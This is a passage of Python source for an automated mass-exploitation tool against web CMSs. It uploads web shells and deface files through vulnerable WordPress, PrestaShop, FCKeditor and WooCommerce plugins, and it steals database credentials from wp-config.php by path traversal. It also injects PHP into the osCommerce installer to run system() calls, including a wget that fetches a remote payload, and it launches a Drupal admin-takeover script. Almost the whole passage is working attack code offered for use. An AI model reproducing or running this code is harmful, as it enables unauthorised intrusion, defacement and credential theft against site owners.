1797. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1798. CheckRev6 = requests.get('http://' + site +
1799. '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif', timeout=5)
1800. if 'GIF89a' in CheckRev6.text.encode('utf-8'):
1801. ShellCheck = requests.get('http://' + site +
1802. '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php', timeout=5)
1803. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1804. self.Print_vuln_Shell(
1805. site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php')
1806. with open('result/Shell_results.txt', 'a') as writer:
1807. writer.write(
1808. site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php' + '\n')
1809. self.Print_Vuln_index(site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif')
1810. with open('result/Index_results.txt', 'a') as writer:
1811. writer.write(
1812. site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif' + '\n')
1813. self.Revslider_Config(site)
1814. else:
1815. self.Revslider_Config(site)
1816. elif '/wp-content/themes/beach_apollo/' in CheckRevslider.text.encode('utf-8'):
1817. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1818. CheckRev7 = requests.get('http://' + site +
1819. '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1820. if 'GIF89a' in CheckRev7.text.encode('utf-8'):
1821. ShellCheck = requests.get('http://' + site +
1822. '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1823. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1824. self.Print_vuln_Shell(
1825. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php')
1826. with open('result/Shell_results.txt', 'a') as writer:
1827. writer.write(
1828. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1829. self.Print_Vuln_index(
1830. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif')
1831. with open('result/Index_results.txt', 'a') as writer:
1832. writer.write(
1833. site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1834. self.Revslider_Config(site)
1835. else:
1836. self.Revslider_Config(site)
1837. elif '/wp-content/themes/cuckootap/' in CheckRevslider.text.encode('utf-8'):
1838. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1839. CheckRev8 = requests.get('http://' + site +
1840. '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1841. if 'GIF89a' in CheckRev8.text.encode('utf-8'):
1842. ShellCheck = requests.get('http://' + site +
1843. '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1844. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1845. self.Print_vuln_Shell(
1846. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php')
1847. with open('result/Shell_results.txt', 'a') as writer:
1848. writer.write(
1849. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1850. self.Print_Vuln_index(
1851. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif')
1852. with open('result/Index_results.txt', 'a') as writer:
1853. writer.write(
1854. site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1855. self.Revslider_Config(site)
1856. else:
1857. self.Revslider_Config(site)
1858. elif '/wp-content/themes/pindol/' in CheckRevslider.text.encode('utf-8'):
1859. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1860. CheckRev9 = requests.get('http://' + site +
1861. '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif', timeout=5)
1862. if 'GIF89a' in CheckRev9.text.encode('utf-8'):
1863. ShellCheck = requests.get('http://' + site +
1864. '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php', timeout=5)
1865. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1866. self.Print_vuln_Shell(
1867. site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php')
1868. with open('result/Shell_results.txt', 'a') as writer:
1869. writer.write(
1870. site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php' + '\n')
1871. self.Print_Vuln_index(site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif')
1872. with open('result/Index_results.txt', 'a') as writer:
1873. writer.write(
1874. site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif' + '\n')
1875. self.Revslider_Config(site)
1876. else:
1877. self.Revslider_Config(site)
1878. elif '/wp-content/themes/designplus/' in CheckRevslider.text.encode('utf-8'):
1879. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1880. CheckRev10 = requests.get('http://' + site +
1881. '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1882. if 'GIF89a' in CheckRev10.text.encode('utf-8'):
1883. ShellCheck = requests.get('http://' + site +
1884. '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1885. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1886. self.Print_vuln_Shell(
1887. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php')
1888. with open('result/Shell_results.txt', 'a') as writer:
1889. writer.write(
1890. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1891. self.Print_Vuln_index(
1892. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif')
1893. with open('result/Index_results.txt', 'a') as writer:
1894. writer.write(
1895. site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1896. self.Revslider_Config(site)
1897. else:
1898. self.Revslider_Config(site)
1899. elif '/wp-content/themes/rarebird/' in CheckRevslider.text.encode('utf-8'):
1900. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1901. CheckRev11 = requests.get('http://' + site +
1902. '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1903. if 'GIF89a' in CheckRev11.text.encode('utf-8'):
1904. ShellCheck = requests.get('http://' + site +
1905. '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1906. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1907. self.Print_vuln_Shell(
1908. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php')
1909. with open('result/Shell_results.txt', 'a') as writer:
1910. writer.write(
1911. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1912. self.Print_Vuln_index(
1913. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif')
1914. with open('result/Index_results.txt', 'a') as writer:
1915. writer.write(
1916. site + '/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1917. self.Revslider_Config(site)
1918.  
1919. else:
1920. self.Revslider_Config(site)
1921. elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
1922. requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
1923. CheckRev12 = requests.get('http://' + site +
1924. '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
1925. if 'GIF89a' in CheckRev12.text.encode('utf-8'):
1926. ShellCheck = requests.get('http://' + site +
1927. '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
1928. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
1929. self.Print_vuln_Shell(
1930. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php')
1931. with open('result/Shell_results.txt', 'a') as writer:
1932. writer.write(
1933. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
1934. self.Print_Vuln_index(
1935. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif')
1936. with open('result/Index_results.txt', 'a') as writer:
1937. writer.write(
1938. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
1939. self.Revslider_Config(site)
1940. else:
1941. self.Revslider_Config(site)
1942. else:
1943. self.Print_NotVuln('revslider', site)
1944. except:
1945. self.Print_NotVuln('revslider', site)
1946.  
1947. def Revslider_Config(self, site):
1948. try:
1949. Exp = 'http://' + site + \
1950. '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
1951. GetConfig = requests.get(Exp, timeout=5)
1952. if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
1953. self.Print_vuln_Config(site)
1954. with open('result/Config_results.txt', 'a') as ww:
1955. ww.write('Full Config Path : ' + Exp + '\n')
1956. try:
1957. Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
1958. Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
1959. Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
1960. Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
1961. with open('result/Config_results.txt', 'a') as ww:
1962. ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
1963. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
1964. 0] + '\n---------------------\n')
1965. self.Revslider_css(site)
1966. except:
1967. self.Revslider_css(site)
1968. else:
1969. self.Revslider_css(site)
1970. except:
1971. self.Revslider_css(site)
1972.  
1973. def viral_optins(self, site):
1974. try:
1975. defaceFile = {
1976. 'Filedata': ('vuln.txt', open(self.TextindeX, 'rb'), 'text/html')
1977. }
1978. x = requests.post('http://' + site + '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php',
1979. files=defaceFile, timeout=5)
1980. if 'id="wpvimgres"' in x.text.encode('utf-8'):
1981. uploader = site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt'
1982. GoT = requests.get('http://' + uploader, timeout=5)
1983. find = re.findall('<img src="http://(.*)" height="', x.text.encode('utf-8'))
1984. GoT2 = requests.get('http://' + find[0], timeout=5)
1985. print find[0]
1986. if 'Vuln!!' in GoT.text.encode('utf-8'):
1987. self.Print_Vuln_index(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt')
1988. with open('result/Index_results.txt', 'a') as writer:
1989. writer.write(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt' + '\n')
1990. elif 'Vuln!!' in GoT2.text.encode('utf-8'):
1991. self.Print_Vuln_index(find[0])
1992. with open('result/Index_results.txt', 'a') as writer:
1993. writer.write(site + find[0] + '\n')
1994. else:
1995. self.Print_NotVuln('viral optins', site)
1996. else:
1997. self.Print_NotVuln('viral optins', site)
1998. except:
1999. self.Print_NotVuln('viral optins', site)
2000.  
2001.  
2002. def Woocomrece(self, site):
2003. try:
2004. Exp = 'http://' + site + '/wp-admin/admin-ajax.php'
2005. Postdata = {'action': 'nm_personalizedproduct_upload_file', 'name': 'upload.php'}
2006. FileData = {'file': (self.pagelinesExploitShell.split('/')[1], open(self.pagelinesExploitShell, 'rb'),
2007. 'multipart/form-data')}
2008. GoT = requests.post(Exp, files=FileData, data=Postdata, timeout=5)
2009. if GoT.status_code == 200 or 'success' in GoT.text.encode('utf-8'):
2010. UploadPostPath = 'http://' + site + '/wp-content/uploads/product_files/upload.php'
2011. CheckShell = requests.get(UploadPostPath, timeout=5)
2012. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2013. shellChecker = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
2014. if 'Vuln!!' in shellChecker.text.encode('utf-8'):
2015. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
2016. with open('result/Shell_results.txt', 'a') as writer:
2017. writer.write(site + '/wp-content/vuln.php' + '\n')
2018. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
2019. if 'Vuln!!' in IndexCheck.text.encode('utf-8'):
2020. self.Print_Vuln_index(site + '/vuln.htm')
2021. with open('result/Index_results.txt', 'a') as writer:
2022. writer.write(site + '/vuln.htm' + '\n')
2023. else:
2024. self.Print_NotVuln('Woocomrece', site)
2025. else:
2026. self.Print_NotVuln('Woocomrece', site)
2027. else:
2028. self.Print_NotVuln('Woocomrece', site)
2029. except:
2030. self.Print_NotVuln('Woocomrece', site)
2031.  
2032.  
2033. def FckPath(self, zzz):
2034. try:
2035. find = re.findall(',"(.*)","', zzz)
2036. path = find[0].strip()
2037. return path
2038. except:
2039. pass
2040.  
2041. def FckEditor(self, site):
2042. try:
2043. exp2 = '/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media'
2044. try:
2045. CheckVuln = requests.get('http://' + site + exp2, timeout=5)
2046. if 'OnUploadCompleted(202' in CheckVuln.text.encode('utf-8'):
2047. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
2048. 'Accept': '*/*'}
2049. exp = 'http://' + site + exp2
2050. po = {'Content_Type': 'form-data'}
2051. fil = {'NewFile': open(self.Jce_Deface_image, 'rb')}
2052. rr = requests.post(exp, data=po, headers=headers, timeout=10, files=fil)
2053. if '.gif' in rr.text.encode('utf-8'):
2054. zart = self.FckPath(rr.text.encode('utf-8'))
2055. x = 'http://' + site + str(zart)
2056. wcheck2 = requests.get(x, timeout=5)
2057. if wcheck2.status_code == 200:
2058. check_deface = requests.get(x, timeout=10)
2059. if 'GIF89a' in check_deface.text.encode('utf-8'):
2060. self.Print_Vuln_index(site + str(zart))
2061. with open('result/Index_results.txt', 'a') as writer:
2062. writer.write(site + str(zart) + '\n')
2063. else:
2064. self.Print_NotVuln('fckeditor', site)
2065. else:
2066. self.Print_NotVuln('fckeditor', site)
2067. else:
2068. self.Print_NotVuln('fckeditor', site)
2069. else:
2070. self.Print_NotVuln('fckeditor', site)
2071. except:
2072. self.Print_NotVuln('fckeditor', site)
2073. except:
2074. self.Print_NotVuln('fckeditor', site)
2075.  
2076. def Drupal_Sqli_Addadmin(self, site):
2077. os.system('python files/adminTakeoverdupal.py -t http://' + site + ' -u pwndrupal -p pwndrupal')
2078.  
2079. def osCommerce(self, site):
2080. try:
2081. CheckVuln = requests.get('http://' + site + '/install/index.php', timeout=5)
2082. if 'Welcome to osCommerce' in CheckVuln.text.encode('utf-8') or CheckVuln.status_code == 200:
2083. Exp = site + '/install/install.php?step=4'
2084. data = {
2085. 'DIR_FS_DOCUMENT_ROOT': './'
2086. }
2087. shell = '\');'
2088. shell += 'system("wget https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/OsComPayLoad.php");'
2089. shell += '/*'
2090. deface = '\');'
2091. deface += 'system("echo Vuln!! patch it Now!> ../../vuln.htm");'
2092. deface += '/*'
2093. data['DB_DATABASE'] = deface
2094. r = requests.post(url='http://' + Exp, data=data, timeout=5)
2095. if r.status_code == 200:
2096. requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
2097. CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
2098. if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
2099. self.Print_Vuln_index(site + '/vuln.htm')
2100. with open('result/Index_results.txt', 'a') as writer:
2101. writer.write(site + '/vuln.txt' + '\n')
2102. try:
2103. data['DB_DATABASE'] = shell
2104. requests.post(url='http://' + Exp, data=data, timeout=5)
2105. requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
2106. requests.get('http://' + site + '/install/includes/OsComPayLoad.php', timeout=5)
2107. Checkshell = requests.get('http://' + site + '/install/includes/vuln.php', timeout=5)
2108. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2109. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
2110. with open('result/Shell_results.txt', 'a') as writer:
2111. writer.write(site + '/wp-content/vuln.php' + '\n')
2112. except:
2113. pass
2114. else:
2115. self.Print_NotVuln('osCommerce RCE', site)
2116. else:
2117. self.Print_NotVuln('osCommerce RCE', site)
2118. else:
2119. self.Print_NotVuln('osCommerce RCE', site)
2120. except:
2121. self.Print_NotVuln('osCommerce RCE', site)
2122.  
2123. def columnadverts(self, site):
2124. try:
2125. Exp = site + '/modules/columnadverts/uploadimage.php'
2126. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2127. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2128. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2129. if 'success' in GoT.text.encode('utf-8'):
2130. IndexPath = '/modules/columnadverts/slides/' + self.Jce_Deface_image.split('/')[1]
2131. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2132. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2133. self.Print_Vuln_index(IndexPath)
2134. with open('result/Index_results.txt', 'a') as writer:
2135. writer.write(IndexPath + '\n')
2136. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2137. ShellPath = '/modules/columnadverts/slides/' + self.ShellPresta.split('/')[1]
2138. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2139. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2140. self.Print_vuln_Shell(site + ShellPath)
2141. with open('result/Shell_results.txt', 'a') as writer:
2142. writer.write(site + ShellPath + '\n')
2143. else:
2144. self.Print_NotVuln('columnadverts', site)
2145. else:
2146. self.Print_NotVuln('columnadverts', site)
2147. except:
2148. self.Print_NotVuln('columnadverts', site)
2149.  
2150. def soopamobile(self, site):
2151. try:
2152. Exp = site + '/modules/soopamobile/uploadimage.php'
2153. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2154. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2155. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2156. if 'success' in GoT.text.encode('utf-8'):
2157. IndexPath = '/modules/soopamobile/slides/' + self.Jce_Deface_image.split('/')[1]
2158. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2159. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2160. self.Print_Vuln_index(IndexPath)
2161. with open('result/Index_results.txt', 'a') as writer:
2162. writer.write(IndexPath + '\n')
2163. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2164. ShellPath = '/modules/soopamobile/slides/' + self.ShellPresta.split('/')[1]
2165. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2166. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2167. self.Print_vuln_Shell(ShellPath)
2168. with open('result/Shell_results.txt', 'a') as writer:
2169. writer.write(ShellPath + '\n')
2170. else:
2171. self.Print_NotVuln('soopamobile', site)
2172. else:
2173. self.Print_NotVuln('soopamobile', site)
2174. except:
2175. self.Print_NotVuln('soopamobile', site)
2176.  
2177.  
2178. def soopabanners(self, site):
2179. try:
2180. Exp = site + '/modules/soopabanners/uploadimage.php'
2181. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2182. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2183. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2184. if 'success' in GoT.text.encode('utf-8'):
2185. IndexPath = '/modules/soopabanners/slides/' + self.Jce_Deface_image.split('/')[1]
2186. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2187. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2188. self.Print_Vuln_index(IndexPath)
2189. with open('result/Index_results.txt', 'a') as writer:
2190. writer.write(IndexPath + '\n')
2191. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2192. ShellPath = '/modules/soopabanners/slides/' + self.ShellPresta.split('/')[1]
2193. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2194. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2195. self.Print_vuln_Shell(ShellPath)
2196. with open('result/Shell_results.txt', 'a') as writer:
2197. writer.write(ShellPath + '\n')
2198. else:
2199. self.Print_NotVuln('soopabanners', site)
2200. else:
2201. self.Print_NotVuln('soopabanners', site)
2202. except:
2203. self.Print_NotVuln('soopabanners', site)
2204.  
2205.  
2206. def vtermslideshow(self, site):
2207. try:
2208. Exp = site + '/modules/vtermslideshow/uploadimage.php'
2209. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2210. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2211. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2212. if 'success' in GoT.text.encode('utf-8'):
2213. IndexPath = '/modules/vtermslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
2214. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2215. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2216. self.Print_Vuln_index(IndexPath)
2217. with open('result/Index_results.txt', 'a') as writer:
2218. writer.write(IndexPath + '\n')
2219. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2220. ShellPath = '/modules/vtermslideshow/slides/' + self.ShellPresta.split('/')[1]
2221. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2222. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2223. self.Print_vuln_Shell(ShellPath)
2224. with open('result/Shell_results.txt', 'a') as writer:
2225. writer.write(ShellPath + '\n')
2226. else:
2227. self.Print_NotVuln('vtermslideshow', site)
2228. else:
2229. self.Print_NotVuln('vtermslideshow', site)
2230. except:
2231. self.Print_NotVuln('vtermslideshow', site)
2232.  
2233. def simpleslideshow(self, site):
2234. try:
2235. Exp = site + '/modules/simpleslideshow/uploadimage.php'
2236. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2237. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2238. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2239. if 'success' in GoT.text.encode('utf-8'):
2240. IndexPath = '/modules/simpleslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
2241. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2242. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2243. self.Print_Vuln_index(IndexPath)
2244. with open('result/Index_results.txt', 'a') as writer:
2245. writer.write(IndexPath + '\n')
2246. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2247. ShellPath = '/modules/simpleslideshow/slides/' + self.ShellPresta.split('/')[1]
2248. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2249. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2250. self.Print_vuln_Shell(ShellPath)
2251. with open('result/Shell_results.txt', 'a') as writer:
2252. writer.write(ShellPath + '\n')
2253. else:
2254. self.Print_NotVuln('simpleslideshow', site)
2255. else:
2256. self.Print_NotVuln('simpleslideshow', site)
2257. except:
2258. self.Print_NotVuln('simpleslideshow', site)
2259.  
2260. def productpageadverts(self, site):
2261. try:
2262. Exp = site + '/modules/productpageadverts/uploadimage.php'
2263. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2264. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2265. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2266. if 'success' in GoT.text.encode('utf-8'):
2267. IndexPath = '/modules/productpageadverts/slides/' + self.Jce_Deface_image.split('/')[1]
2268. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2269. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2270. self.Print_Vuln_index(IndexPath)
2271. with open('result/Index_results.txt', 'a') as writer:
2272. writer.write(IndexPath + '\n')
2273. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2274. ShellPath = '/modules/productpageadverts/slides/' + self.ShellPresta.split('/')[1]
2275. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2276. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2277. self.Print_vuln_Shell(ShellPath)
2278. with open('result/Shell_results.txt', 'a') as writer:
2279. writer.write(ShellPath + '\n')
2280. else:
2281. self.Print_NotVuln('productpageadverts', site)
2282. else:
2283. self.Print_NotVuln('productpageadverts', site)
2284. except:
2285. self.Print_NotVuln('productpageadverts', site)
2286.  
2287. def homepageadvertise(self, site):
2288. try:
2289. Exp = site + '/modules/homepageadvertise/uploadimage.php'
2290. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2291. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2292. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2293. if 'success' in GoT.text.encode('utf-8'):
2294. IndexPath = '/modules/homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
2295. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2296. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2297. self.Print_Vuln_index(IndexPath)
2298. with open('result/Index_results.txt', 'a') as writer:
2299. writer.write(IndexPath + '\n')
2300. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2301. ShellPath = '/modules/homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
2302. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2303. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2304. self.Print_vuln_Shell(ShellPath)
2305. with open('result/Shell_results.txt', 'a') as writer:
2306. writer.write(ShellPath + '\n')
2307. else:
2308. self.Print_NotVuln('homepageadvertise', site)
2309. else:
2310. self.Print_NotVuln('homepageadvertise', site)
2311. except:
2312. self.Print_NotVuln('homepageadvertise', site)
2313.  
2314. def homepageadvertise2(self, site):
2315. try:
2316. Exp = site + '/modules/homepageadvertise2/uploadimage.php'
2317. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2318. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2319. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2320. if 'success' in GoT.text.encode('utf-8'):
2321. IndexPath = '/modules/homepageadvertise2/slides/' + self.Jce_Deface_image.split('/')[1]
2322. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2323. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2324. self.Print_Vuln_index(IndexPath)
2325. with open('result/Index_results.txt', 'a') as writer:
2326. writer.write(IndexPath + '\n')
2327. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2328. ShellPath = '/modules/homepageadvertise2/slides/' + self.ShellPresta.split('/')[1]
2329. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2330. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2331. self.Print_vuln_Shell(ShellPath)
2332. with open('result/Shell_results.txt', 'a') as writer:
2333. writer.write(ShellPath + '\n')
2334. else:
2335. self.Print_NotVuln('homepageadvertise2', site)
2336. else:
2337. self.Print_NotVuln('homepageadvertise2', site)
2338. except:
2339. self.Print_NotVuln('homepageadvertise2', site)
2340.  
2341. def jro_homepageadvertise(self, site):
2342. try:
2343. Exp = site + '/modules/jro_homepageadvertise/uploadimage.php'
2344. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2345. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2346. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2347. if 'success' in GoT.text.encode('utf-8'):
2348. IndexPath = '/modules/jro_homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
2349. CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
2350. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2351. self.Print_Vuln_index(IndexPath)
2352. with open('result/Index_results.txt', 'a') as writer:
2353. writer.write(IndexPath + '\n')
2354. requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2355. ShellPath = '/modules/jro_homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
2356. CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
2357. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2358. self.Print_vuln_Shell(ShellPath)
2359. with open('result/Shell_results.txt', 'a') as writer:
2360. writer.write(ShellPath + '\n')
2361. else:
2362. self.Print_NotVuln('jro_homepageadvertise', site)
2363. else:
2364. self.Print_NotVuln('jro_homepageadvertise', site)
2365. except:
2366. self.Print_NotVuln('jro_homepageadvertise', site)
2367.  
2368. def attributewizardpro(self, site):
2369. try:
2370. Exp = site + '/modules/attributewizardpro/file_upload.php'
2371. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2372. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2373. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2374. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
2375. Index = GoT.text.encode('utf-8').split('|||')[0]
2376. print Index
2377. IndexPath = site + '/modules/attributewizardpro/file_uploads/' + Index
2378. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2379. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2380. self.Print_Vuln_index(IndexPath)
2381. with open('result/Index_results.txt', 'a') as writer:
2382. writer.write(IndexPath + '\n')
2383. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2384. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
2385. Shell = Got2.text.encode('utf-8').split('|||')[0]
2386. ShellPath = site + '/modules/attributewizardpro/file_uploads/' + Shell
2387. CheckShell = requests.get('http://' + ShellPath, timeout=5)
2388. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2389. self.Print_vuln_Shell(ShellPath)
2390. with open('result/Shell_results.txt', 'a') as writer:
